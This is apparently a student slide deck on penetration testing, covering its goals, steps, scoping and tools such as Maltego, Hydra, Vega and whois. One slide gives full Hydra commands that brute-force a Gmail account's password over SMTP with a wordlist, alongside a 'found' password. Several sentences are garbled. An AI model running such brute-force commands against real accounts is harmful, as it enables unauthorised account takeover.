penetration test paper
pranith
order_38065_808041.pptPenetration Testing
What is a penetration test?(informal)
3
- Port scanning
- Vulnerability Scanning
- Penetration Testing
What is a penetration test?
4
- A penetration test is used to simulate an attack on a computer system, web application in order to give vulnerabilities. The attacker takes potential gaining the functionality and data.
- Penetration tests is automated with an application although other penetration tests can be done manually.
The process includes:
- trying to get the target data.
- Port scanning,
- attempting to break in
- Reporting back the findings.
Why conduct a penetration test?
- Test your security controls
- Ensure system security
- Prevent data breach
- Get a baseline
- Compliance
*
*
Steps of penetration test (informal)
6
- Establish goal of the test
- Information collection
- Discovery
- Vulnerability analysis
- Taking control
Exploitation
Social engineering
- Reporting
- Evidence collection
- Risk analysis
- Remediation
Some Considerations
7
- Scope must be defined
- Testing can be done both Internal or external
- The testing can be In-house or outsourced
- White hat hacker
- Black hat hacker
Steps of penetration test
8
The following is to be done during the penetration testing
- Information Gathering
- Configuration and Deploy Management Testing
- Identity Management Testing
- Authentication Testing
- Authorization Testing
- Data Validation Testing
- Cryptography
- Business Logic Testing
- Client Side Testing
Steps of network penetration test
9
All the tests are done using qualified testers and using known security software to carry out the tests. Penetration tests is done to unearth the vulnerabilities such as inappropriate system configurations to unknown hardware flaws.
*
Example of Pen Testing: Kali Linux
- Kali Linux is a Debian Distribution which is designed for forensics
- Kali Linux is preinstalled with numerous penetration-testing programs.
- From the creators of BackTrack comes Kali Linux, the most advanced penetration testing distribution created till now.
*
*
Penetration testing tools
Maltego: for information gathering step
Hydra: for brute force step
Vega: for Vulnerability analysis
whois: for information gathering step
*
In order to secure very complex IT environment and ensure the business objectives are reached, there threats for the major systems in the company continue being profitable and achieving the business and corporate goals. A penetration test is the use of automates and manual techniques in simulating attacks.
*
Maltego
- Maltego is an open source intelligence and forensics application.
*
The scope of the test will engage both internal and external environment.
The gray approach will be deployed in the system penetration
The results will be unannounced, only leaked to the top management
*
WHOIS SERVICE
- WHOIS is used to register the owners of the websites
- It is also used for a wider range of other information.
- The content in the WHOIS is in the human readable format
*
Vega
- This is an open source testing platform which is used in testing the security applications
- Vega is used in SQL injection and cross site scripting (XSS)
- It is written in Java, GUI based, and runs on Linux, OS X, and Windows
*
3- Hydra found gmail password:11111111
4- Or you can go to the command line terminal and type:
hydra -S -l [email protected] -P /root/Desktop/pass4.txt -V -s 465 smtp.gmail.com smtp
Or type:
hydra -s 465 -S -V -l [email protected] -P/root/Desktop/pass4.txt -e s -t 36 -w 36 smtp.gmail.com smtp
*
*
References
Agarwal, M., & Singh, A. (2013). Metasploit Penetration Testing Cookbook. Birmingham, UK: Packt Publishing.
Ali, S., & Heriyanto, T. (2011). BackTrack 4: assuring security by penetration testing. Birmingham [u.a.]: Packt Publ.
Fadyushin, V. (2013). Instant penetration testing. Birmingham: Packt Pub.
Leeuw, E., Beringen, F., & Verruijt, A. (2009). Penetration testing. Rotterdam: A.A. Balkema.
